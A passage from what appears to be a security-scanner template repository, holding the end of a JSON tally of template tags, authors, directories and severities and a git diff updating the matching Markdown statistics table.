p","count":1},{"name":"sentry","count":1},{"name":"magicflow","count":1},{"name":"szhe","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"rubedo","count":1},{"name":"sarg","count":1},{"name":"appweb","count":1},{"name":"gateone","count":1},{"name":"thinkadmin","count":1},{"name":"wmt","count":1},{"name":"plastic","count":1},{"name":"fortigate","count":1},{"name":"chinaunicom","count":1},{"name":"nette","count":1},{"name":"rsyncd","count":1},{"name":"socomec","count":1},{"name":"gridx","count":1},{"name":"saltapi","count":1},{"name":"db","count":1},{"name":"zend","count":1},{"name":"nsasg","count":1},{"name":"wuzhicms","count":1},{"name":"spip","count":1},{"name":"jfrog","count":1},{"name":"goahead","count":1},{"name":"netdata","count":1},{"name":"eprints","count":1},{"name":"calendarix","count":1},{"name":"tamronos","count":1},{"name":"sprintful","count":1},{"name":"tieline","count":1},{"name":"k8s","count":1},{"name":"sage","count":1},{"name":"lancom","count":1},{"name":"monitorr","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"netrc","count":1},{"name":"sitecore","count":1},{"name":"qcubed","count":1},{"name":"cloudinary","count":1},{"name":"trane","count":1},{"name":"kafdrop","count":1},{"name":"yii","count":1},{"name":"traefik","count":1},{"name":"exponentcms","count":1},{"name":"jeewms","count":1},{"name":"blue-ocean","count":1},{"name":"wondercms","count":1},{"name":"emc","count":1},{"name":"kong","count":1},{"name":"spidercontrol","count":1},{"name":"seacms","count":1},{"name":"apos","count":1},{"name":"acexy","count":1},{"name":"cofax","count":1},{"name":"klog","count":1},{"name":"dotnetnuke","count":1},{"name":"wamp","count":1},{"name":"varnish","count":1},{"name":"timesheet","count":1},{"name":"kyan","count":1},{"name":"gotmls","count":1},{"name":"wavlink","count":1},{"name":"clusterengine","count":1},{"name":"synnefo","count":1},{"name":"oscommerce","count":1},{"name":"woocomernce","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"visionhub","count":1},{"name":"anchorcms","count":1},{"name":"zyxel","count":1},{"name":" default-login","count":1},{"name":"powercreator","count":1},{"name":"pcoip","count":1},{"name":"cve2006","count":1},{"name":"resourcespace","count":1},{"name":"solman","count":1},{"name":"ntopng","count":1},{"name":"spring","count":1},{"name":"timeclock","count":1},{"name":"dbeaver","count":1},{"name":"favicon","count":1},{"name":"portainer","count":1},{"name":"sceditor","count":1},{"name":"ewebs","count":1},{"name":"ricoh","count":1},{"name":"panabit","count":1},{"name":"exposures","count":1},{"name":"octoprint","count":1},{"name":"hiboss","count":1},{"name":"swagger","count":1},{"name":"sco","count":1},{"name":"fiori","count":1},{"name":"plugin","count":1},{"name":"tapestry","count":1},{"name":"ssltls","count":1},{"name":"k8","count":1},{"name":"ecom","count":1},{"name":"viewpoint","count":1},{"name":"htmli","count":1},{"name":"office365","count":1},{"name":"phalcon","count":1},{"name":"zeroshell","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"camera","count":1},{"name":"redwood","count":1},{"name":"rdp","count":1},{"name":"getsimple","count":1},{"name":"alibaba","count":1},{"name":"sureline","count":1},{"name":"vsphere","count":1},{"name":"acme","count":1},{"name":"twitter-server","count":1},{"name":"uwsgi","count":1},{"name":"parentlink","count":1},{"name":"simplecrm","count":1},{"name":"expose","count":1},{"name":"mailchimp","count":1},{"name":"xml","count":1},{"name":"netgenie","count":1},{"name":"extractor","count":1},{"name":"mediumish","count":1},{"name":"landray","count":1},{"name":"viewlinc","count":1},{"name":"bookstack","count":1},{"name":"checkpoint","count":1},{"name":"servicenow","count":1},{"name":"enum","count":1},{"name":"weiphp","count":1},{"name":"rmc","count":1},{"name":"wifisky","count":1},{"name":"ruby","count":1},{"name":"kubeflow","count":1},{"name":"enumeration","count":1},{"name":"avtech","count":1},{"name":"zookeeper","count":1},{"name":"opm","count":1},{"name":"nomad","count":1},{"name":"fastcgi","count":1},{"name":"dvwa","count":1},{"name":"nedi","count":1},{"name":"tileserver","count":1},{"name":"nc2","count":1},{"name":"lansweeper","count":1},{"name":"razor","count":1},{"name":"nordex","count":1},{"name":"nuuo","count":1},{"name":"mongo","count":1},{"name":"mdb","count":1},{"name":"2014","count":1},{"name":"lutron","count":1},{"name":"harbor","count":1},{"name":"etouch","count":1},{"name":"zm","count":1},{"name":"diris","count":1},{"name":"zmanda","count":1},{"name":"announcekit","count":1},{"name":"mirai","count":1},{"name":"mautic","count":1},{"name":"aura","count":1},{"name":"rhymix","count":1},{"name":"logontracer","count":1},{"name":"pgadmin","count":1},{"name":"glances","count":1},{"name":"sar2html","count":1},{"name":"commscope","count":1},{"name":"linksys","count":1},{"name":"zte","count":1},{"name":"email","count":1},{"name":"opensmtpd","count":1},{"name":"jenkin","count":1},{"name":"mantisbt","count":1},{"name":"fortigates","count":1},{"name":"ueditor","count":1},{"name":"blackboard","count":1},{"name":"dotclear","count":1},{"name":"codemeter","count":1},{"name":"javafaces","count":1},{"name":"mantis","count":1},{"name":"heroku","count":1},{"name":"nps","count":1},{"name":"sqlite","count":1},{"name":"webmin","count":1},{"name":"apiman","count":1},{"name":"scs","count":1},{"name":"trilithic","count":1},{"name":"wildfly","count":1},{"name":"plone","count":1},{"name":"ssl","count":1},{"name":"qvisdvr","count":1},{"name":"phpfusion","count":1},{"name":"fuelcms","count":1},{"name":"hadoop","count":1},{"name":"smi","count":1},{"name":"circontrorl","count":1},{"name":"myucms","count":1},{"name":"metinfo","count":1},{"name":"drone","count":1},{"name":"zzzcms","count":1},{"name":"dom","count":1},{"name":"webmodule-ee","count":1},{"name":"soar","count":1},{"name":"esmtp","count":1},{"name":"arl","count":1},{"name":"jmx","count":1},{"name":"nuxeo","count":1},{"name":"dnssec","count":1},{"name":"ghost","count":1},{"name":"payara","count":1},{"name":"episerver","count":1},{"name":"b2evolution","count":1},{"name":"linkedin","count":1},{"name":"idemia","count":1},{"name":"mariadb","count":1},{"name":"node","count":1},{"name":"haproxy","count":1},{"name":"qsan","count":1},{"name":"dompdf","count":1},{"name":"centos","count":1},{"name":"flink","count":1},{"name":"feifeicms","count":1},{"name":"postmessage","count":1},{"name":"upload","count":1},{"name":"gitlist","count":1},{"name":"opensns","count":1},{"name":"liferay","count":1},{"name":"nexusdb","count":1},{"name":"opentsdb","count":1},{"name":"triconsole","count":1},{"name":"ilo4","count":1},{"name":"huijietong","count":1},{"name":"wooyun","count":1},{"name":"gogs","count":1},{"name":"beanshell","count":1},{"name":"auth","count":1},{"name":"openrestry","count":1},{"name":"duomicms","count":1},{"name":"gespage","count":1},{"name":"chevereto","count":1},{"name":"comodo","count":1},{"name":"optiLink","count":1},{"name":"redcap","count":1},{"name":"exacqvision","count":1},{"name":"oneblog","count":1},{"name":"openx","count":1},{"name":"webftp","count":1},{"name":"qdpm","count":1},{"name":"bigbluebutton","count":1},{"name":"tensorboard","count":1},{"name":"alerta","count":1},{"name":"clink-office","count":1},{"name":"xdcms","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"phpfastcache","count":1},{"name":"eyou","count":1},{"name":"csrf","count":1},{"name":"pulsesecure","count":1},{"name":"camunda","count":1},{"name":"achecker","count":1},{"name":"starttls","count":1},{"name":"cobub","count":1},{"name":"domxss","count":1},{"name":"lighttpd","count":1},{"name":"sangfor","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1}],"authors":[{"name":"dhiyaneshdk","count":245},{"name":"pikpikcu","count":244},{"name":"pdteam","count":198},{"name":"daffainfo","count":164},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":54},{"name":"pussycat0x","count":44},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"iamnoooob","count":5},{"name":"pentest_swissky","count":5},{"name":"meme-lord","count":5},{"name":"ganofins","count":5},{"name":"e_schultze_","count":4},{"name":"dogasantos","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"vsh00t","count":3},{"name":"fyoorer","count":3},{"name":"logicalhunter","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"incogbyte","count":3},{"name":"mavericknerd","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"impramodsargar","count":3},{"name":"jarijaas","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"0xcrypto","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"0xelkomy","count":2},{"name":"mohammedsaneem","count":2},{"name":"unstabl3","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"w4cky_","count":2},{"name":"udit_thakkur","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"koti2","count":2},{"name":"sushantkamble","count":2},{"name":"ehsahil","count":2},{"name":"randomrobbie","count":2},{"name":"x1m_martijn","count":2},{"name":"ree4pwn","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"whoever","count":2},{"name":"gal nagli","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"fabaff","count":2},{"name":"parth","count":2},{"name":"random-robbie","count":2},{"name":"arcc","count":2},{"name":"amsda","count":2},{"name":"bsysop","count":2},{"name":"foulenzer","count":2},{"name":"vavkamil","count":2},{"name":"joeldeleep","count":2},{"name":"kiblyn11","count":2},{"name":"hahwul","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"furkansenan","count":1},{"name":"omarkurt","count":1},{"name":"pudsec","count":1},{"name":"petruknisme","count":1},{"name":"pratik khalane","count":1},{"name":"regala_","count":1},{"name":"alex","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"naglinagli","count":1},{"name":"aresx","count":1},{"name":"0xteles","count":1},{"name":"blckraven","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"mubassirpatel","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"hanlaomo","count":1},{"name":"abison_binoy","count":1},{"name":"r3naissance","count":1},{"name":"becivells","count":1},{"name":"makyotox","count":1},{"name":"kurohost","count":1},{"name":"th3.d1p4k","count":1},{"name":"sec_hawk","count":1},{"name":"whynotke","count":1},{"name":"jeya seelan","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"nytr0gen","count":1},{"name":"undefl0w","count":1},{"name":"intx0x80","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"kareemse1im","count":1},{"name":"affix","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"daviey","count":1},{"name":"berkdusunur","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"jteles","count":1},{"name":"b0yd","count":1},{"name":"gboddin","count":1},{"name":"mah3sec_","count":1},{"name":"rojanrijal","count":1},{"name":"luskabol","count":1},{"name":"mhdsamx","count":1},{"name":"fmunozs","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"bad5ect0r","count":1},{"name":"mass0ma","count":1},{"name":"alph4byt3","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"dawid czarnecki","count":1},{"name":"bjhulst","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"cookiehanhoan","count":1},{"name":"infosecsanyam","count":1},{"name":"kabirsuda","count":1},{"name":"streetofhackerr007","count":1},{"name":"soyelmago","count":1},{"name":"luci","count":1},{"name":"akshansh","count":1},{"name":"_harleo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rtcms","count":1},{"name":"taielab","count":1},{"name":"udyz","count":1},{"name":"shreyapohekar","count":1},{"name":"fopina","count":1},{"name":"b4uh0lz","count":1},{"name":"iampritam","count":1},{"name":"sshell","count":1},{"name":"0xtavian","count":1},{"name":"@dwisiswant0","count":1},{"name":"elmahdi","count":1},{"name":"patralos","count":1},{"name":"huowuzhao","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"sickwell","count":1},{"name":"adrianmf","count":1},{"name":"un-fmunozs","count":1},{"name":"philippdelteil","count":1},{"name":"wabafet","count":1},{"name":"yashgoti","count":1},{"name":"borna nematzadeh","count":1},{"name":"sullo","count":1},{"name":"pdp","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"_c0wb0y_","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"andirrahmani1","count":1},{"name":"smaranchand","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"manuelbua","count":1},{"name":"g4l1t0","count":1},{"name":"alperenkesk","count":1},{"name":"zhenwarx","count":1},{"name":"c3l3si4n","count":1},{"name":"co0nan","count":1},{"name":"revblock","count":1},{"name":"andysvints","count":1},{"name":"idealphase","count":1},{"name":"deena","count":1},{"name":"me9187","count":1},{"name":"0xrod","count":1},{"name":"mesaglio","count":1},{"name":"remonsec","count":1},{"name":"vzamanillo","count":1},{"name":"raesene","count":1},{"name":"j33n1k4","count":1},{"name":"0ut0fb4nd","count":1},{"name":"tirtha_mandal","count":1},{"name":"toufik airane","count":1},{"name":"qlkwej","count":1},{"name":"juicypotato1","count":1},{"name":"exploitation","count":1},{"name":"chron0x","count":1},{"name":"zandros0","count":1},{"name":"its0x08","count":1},{"name":"convisoappsec","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"evolutionsec","count":1},{"name":"0h1in9e","count":1},{"name":"s1r1u5_","count":1},{"name":"d0rkerdevil","count":1},{"name":"bolli95","count":1},{"name":"bernardofsr","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"yashanand155","count":1},{"name":"tim_koopmans","count":1},{"name":"sy3omda","count":1},{"name":"akash.c","count":1},{"name":"notsoevilweasel","count":1},{"name":"thezakman","count":1},{"name":"retr0","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"apt-mirror","count":1},{"name":"shifacyclewla","count":1},{"name":"ajaysenr","count":1},{"name":"hakluke","count":1},{"name":"yavolo","count":1}],"directory":[{"name":"cves","count":640},{"name":"vulnerabilities","count":283},{"name":"exposed-panels","count":231},{"name":"exposures","count":184},{"name":"technologies","count":163},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":29},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":603},{"name":"high","count":510},{"name":"medium","count":402},{"name":"critical","count":232},{"name":"low","count":160}],"types":[{"name":"http","count":1807},{"name":"file","count":46},{"name":"network","count":38},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index ca0925968b..36506e5b4e 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,732 +1,736 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| tech | 103 | pussycat0x | 42 | workflows | 35 | | | | | -| cve2021 | 103 | gaurang | 42 | network | 29 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | +| cve2021 | 104 | gaurang | 42 | network | 29 | | | | | | config | 93 | ice3man | 26 | miscellaneous | 27 | | | | | -| cve2019 | 88 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 78 | 0x_akoko | 23 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | -| | 65 | sheikhrishad | 15 | cnvd | 9 | | | | | -| token | 64 | milo2012 | 14 | headless | 5 | | | | | -| apache | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 57 | pr3r00t | 13 | | | | | | | -| iot | 54 | suman_kar | 12 | | | | | | | -| cve2017 | 48 | r3dg33k | 11 | | | | | | | -| file | 46 | cyllective | 11 | | | | | | | -| oob | 45 | righettod | 10 | | | | | | | -| unauth | 42 | random_robbie | 10 | | | | | | | -| network | 38 | hackergautam | 9 | | | | | | | -| joomla | 36 | nadino | 9 | | | | | | | -| sqli | 36 | wdahlenb | 9 | | | | | | | -| ssrf | 32 | melbadry9 | 9 | | | | | | | -| cve2016 | 32 | aashiq | 8 | | | | | | | -| oracle | 30 | that_juan_ | 8 | | | | | | | -| logs | 30 | iamthefrogy | 8 | | | | | | | -| workflow | 30 | harshbothra_ | 7 | | | | | | | -| cve2010 | 28 | 0x240x23elu | 7 | | | | | | | -| misc | 27 | dr_set | 7 | | | | | | | -| atlassian | 27 | oppsec | 7 | | | | | | | +| cve2019 | 90 | organiccrap | 24 | iot | 23 | | | | | +| cve2018 | 79 | 0x_akoko | 23 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 19 | cnvd | 9 | | | | | +| | 66 | sheikhrishad | 15 | fuzzing | 9 | | | | | +| apache | 64 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 57 | techbrunchfr | 13 | | | | | | | +| iot | 56 | suman_kar | 12 | | | | | | | +| cve2017 | 48 | cyllective | 11 | | | | | | | +| file | 46 | r3dg33k | 11 | | | | | | | +| oob | 45 | random_robbie | 10 | | | | | | | +| unauth | 45 | righettod | 10 | | | | | | | +| joomla | 40 | hackergautam | 9 | | | | | | | +| network | 38 | wdahlenb | 9 | | | | | | | +| sqli | 37 | melbadry9 | 9 | | | | | | | +| ssrf | 32 | nadino | 9 | | | | | | | +| cve2010 | 32 | iamthefrogy | 8 | | | | | | | +| cve2016 | 32 | that_juan_ | 8 | | | | | | | +| workflow | 30 | aashiq | 8 | | | | | | | +| logs | 30 | emadshanab | 7 | | | | | | | +| oracle | 30 | dr_set | 7 | | | | | | | | jira | 27 | techryptic (@tech) | 7 | | | | | | | -| redirect | 25 | kophjager007 | 7 | | | | | | | +| misc | 27 | kophjager007 | 7 | | | | | | | +| atlassian | 27 | harshbothra_ | 7 | | | | | | | +| redirect | 25 | 0x240x23elu | 7 | | | | | | | | listing | 25 | randomstr1ng | 7 | | | | | | | -| generic | 22 | emadshanab | 7 | | | | | | | -| cisco | 19 | puzzlepeaches | 6 | | | | | | | -| aem | 19 | __fazal | 6 | | | | | | | -| disclosure | 18 | caspergn | 6 | | | | | | | -| sap | 18 | panch0r3d | 5 | | | | | | | -| cve2015 | 18 | yanyun | 5 | | | | | | | -| router | 17 | pentest_swissky | 5 | | | | | | | -| auth-bypass | 16 | rootxharsh | 5 | | | | | | | -| springboot | 16 | meme-lord | 5 | | | | | | | -| cve2014 | 15 | ganofins | 5 | | | | | | | -| debug | 14 | joanbono | 5 | | | | | | | -| cve2012 | 14 | iamnoooob | 5 | | | | | | | -| fuzz | 13 | elsfa7110 | 4 | | | | | | | -| misconfig | 13 | e_schultze_ | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | -| struts | 13 | xelkomy | 4 | | | | | | | -| cve2011 | 13 | github.com/its0x08 | 4 | | | | | | | -| weblogic | 12 | yash anand @yashanand155 | 3 | | | | | | | -| dlink | 12 | binaryfigments | 3 | | | | | | | -| adobe | 12 | jarijaas | 3 | | | | | | | -| jenkins | 12 | emenalf | 3 | | | | | | | -| dns | 12 | z3bd | 3 | | | | | | | -| devops | 11 | dudez | 3 | | | | | | | +| generic | 22 | oppsec | 7 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| cve2015 | 18 | __fazal | 6 | | | | | | | +| disclosure | 18 | joanbono | 5 | | | | | | | +| sap | 18 | iamnoooob | 5 | | | | | | | +| router | 17 | yanyun | 5 | | | | | | | +| auth-bypass | 17 | panch0r3d | 5 | | | | | | | +| springboot | 16 | rootxharsh | 5 | | | | | | | +| cve2014 | 15 | pentest_swissky | 5 | | | | | | | +| debug | 14 | meme-lord | 5 | | | | | | | +| cve2012 | 14 | ganofins | 5 | | | | | | | +| struts | 13 | e_schultze_ | 4 | | | | | | | +| fuzz | 13 | github.com/its0x08 | 4 | | | | | | | +| misconfig | 13 | xelkomy | 4 | | | | | | | +| android | 13 | dogasantos | 4 | | | | | | | +| cve2011 | 13 | nodauf | 4 | | | | | | | +| dns | 12 | elsfa7110 | 4 | | | | | | | +| php | 12 | vsh00t | 3 | | | | | | | +| jenkins | 12 | tess | 3 | | | | | | | +| weblogic | 12 | fyoorer | 3 | | | | | | | +| dlink | 12 | shine | 3 | | | | | | | +| adobe | 12 | shifacyclewala | 3 | | | | | | | +| devops | 11 | binaryfigments | 3 | | | | | | | +| zoho | 11 | logicalhunter | 3 | | | | | | | | cve2013 | 11 | incogbyte | 3 | | | | | | | -| zoho | 11 | f1tz | 3 | | | | | | | -| php | 11 | 0w4ys | 3 | | | | | | | -| xxe | 9 | fyoorer | 3 | | | | | | | -| magento | 9 | impramodsargar | 3 | | | | | | | -| ftp | 9 | shifacyclewala | 3 | | | | | | | -| gitlab | 8 | _generic_human_ | 3 | | | | | | | -| aws | 8 | mavericknerd | 3 | | | | | | | -| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| login | 8 | vsh00t | 3 | | | | | | | -| airflow | 8 | tess | 3 | | | | | | | -| rails | 8 | bing0o | 2 | | | | | | | -| ruijie | 8 | parth | 2 | | | | | | | -| vmware | 7 | random-robbie | 2 | | | | | | | -| nginx | 7 | pxmme1337 | 2 | | | | | | | -| backup | 7 | swissky | 2 | | | | | | | -| cve2009 | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| files | 6 | 0xcrypto | 2 | | | | | | | -| google | 6 | 0xrudra | 2 | | | | | | | -| solr | 6 | moritz nentwig | 2 | | | | | | | -| api | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | ehsahil | 2 | | | | | | | -| cve2008 | 6 | koti2 | 2 | | | | | | | -| dell | 6 | gal nagli | 2 | | | | | | | -| coldfusion | 6 | alifathi-h1 | 2 | | | | | | | -| django | 6 | mohammedsaneem | 2 | | | | | | | -| cms | 6 | nkxxkn | 2 | | | | | | | -| netgear | 6 | kiblyn11 | 2 | | | | | | | -| jetty | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | foulenzer | 2 | | | | | | | -| citrix | 6 | arcc | 2 | | | | | | | -| confluence | 5 | joeldeleep | 2 | | | | | | | -| headless | 5 | 0xprial | 2 | | | | | | | -| circarlife | 5 | bsysop | 2 | | | | | | | -| phpmyadmin | 5 | amsda | 2 | | | | | | | -| iis | 5 | bp0lr | 2 | | | | | | | -| ssti | 5 | sushantkamble | 2 | | | | | | | -| dedecms | 5 | vavkamil | 2 | | | | | | | +| ftp | 9 | emenalf | 3 | | | | | | | +| xxe | 9 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 9 | dudez | 3 | | | | | | | +| gitlab | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | mavericknerd | 3 | | | | | | | +| aws | 8 | impramodsargar | 3 | | | | | | | +| login | 8 | 0w4ys | 3 | | | | | | | +| scada | 8 | thomas_from_offensity | 3 | | | | | | | +| airflow | 8 | f1tz | 3 | | | | | | | +| cnvd | 8 | _generic_human_ | 3 | | | | | | | +| rails | 8 | jarijaas | 3 | | | | | | | +| backup | 7 | vavkamil | 2 | | | | | | | +| vmware | 7 | davidmckennirey | 2 | | | | | | | +| nginx | 7 | random-robbie | 2 | | | | | | | +| cms | 7 | foulenzer | 2 | | | | | | | +| cve2009 | 7 | ree4pwn | 2 | | | | | | | +| cve2008 | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| google | 6 | whoever | 2 | | | | | | | +| files | 6 | hetroublemakr | 2 | | | | | | | +| jetty | 6 | unstabl3 | 2 | | | | | | | +| solr | 6 | fabaff | 2 | | | | | | | +| rconfig | 6 | moritz nentwig | 2 | | | | | | | +| api | 6 | hahwul | 2 | | | | | | | +| coldfusion | 6 | x1m_martijn | 2 | | | | | | | +| netgear | 6 | amsda | 2 | | | | | | | +| django | 6 | lotusdll | 2 | | | | | | | +| citrix | 6 | koti2 | 2 | | | | | | | +| laravel | 6 | alifathi-h1 | 2 | | | | | | | +| dell | 6 | mohammedsaneem | 2 | | | | | | | | microsoft | 5 | manas_harsh | 2 | | | | | | | -| fileupload | 5 | 0xsapra | 2 | | | | | | | -| windows | 5 | lu4nx | 2 | | | | | | | -| java | 5 | unstabl3 | 2 | | | | | | | -| drupal | 5 | w4cky_ | 2 | | | | | | | -| ibm | 5 | afaq | 2 | | | | | | | -| lucee | 5 | zomsop82 | 2 | | | | | | | -| wp-theme | 5 | lotusdll | 2 | | | | | | | -| docker | 5 | randomrobbie | 2 | | | | | | | -| vpn | 4 | x1m_martijn | 2 | | | | | | | -| tomcat | 4 | fabaff | 2 | | | | | | | -| moodle | 4 | davidmckennirey | 2 | | | | | | | -| thinkphp | 4 | dheerajmadhukar | 2 | | | | | | | -| exchange | 4 | hahwul | 2 | | | | | | | -| solarwinds | 4 | ree4pwn | 2 | | | | | | | -| deserialization | 4 | hetroublemakr | 2 | | | | | | | -| jolokia | 4 | gevakun | 2 | | | | | | | -| zimbra | 4 | ooooooo_q | 1 | | | | | | | -| firmware | 4 | wabafet | 1 | | | | | | | -| samsung | 4 | pratik khalane | 1 | | | | | | | -| artifactory | 4 | yashgoti | 1 | | | | | | | -| traversal | 4 | alex | 1 | | | | | | | -| grafana | 4 | bad5ect0r | 1 | | | | | | | -| nodejs | 4 | regala_ | 1 | | | | | | | -| hongdian | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| hp | 4 | geraldino2 | 1 | | | | | | | -| elastic | 4 | 52971 | 1 | | | | | | | -| crlf | 4 | alph4byt3 | 1 | | | | | | | -| thinkcmf | 4 | ipanda | 1 | | | | | | | -| webserver | 4 | mhdsamx | 1 | | | | | | | -| asp | 4 | _darrenmartyn | 1 | | | | | | | -| buffalo | 4 | whoever | 1 | | | | | | | -| magmi | 4 | elder tao | 1 | | | | | | | -| itop | 3 | bernardofsr | 1 | | | | | | | -| opensis | 3 | sullo | 1 | | | | | | | -| kubernetes | 3 | deena | 1 | | | | | | | -| httpd | 3 | luskabol | 1 | | | | | | | -| kevinlab | 3 | undefl0w | 1 | | | | | | | -| mongodb | 3 | aresx | 1 | | | | 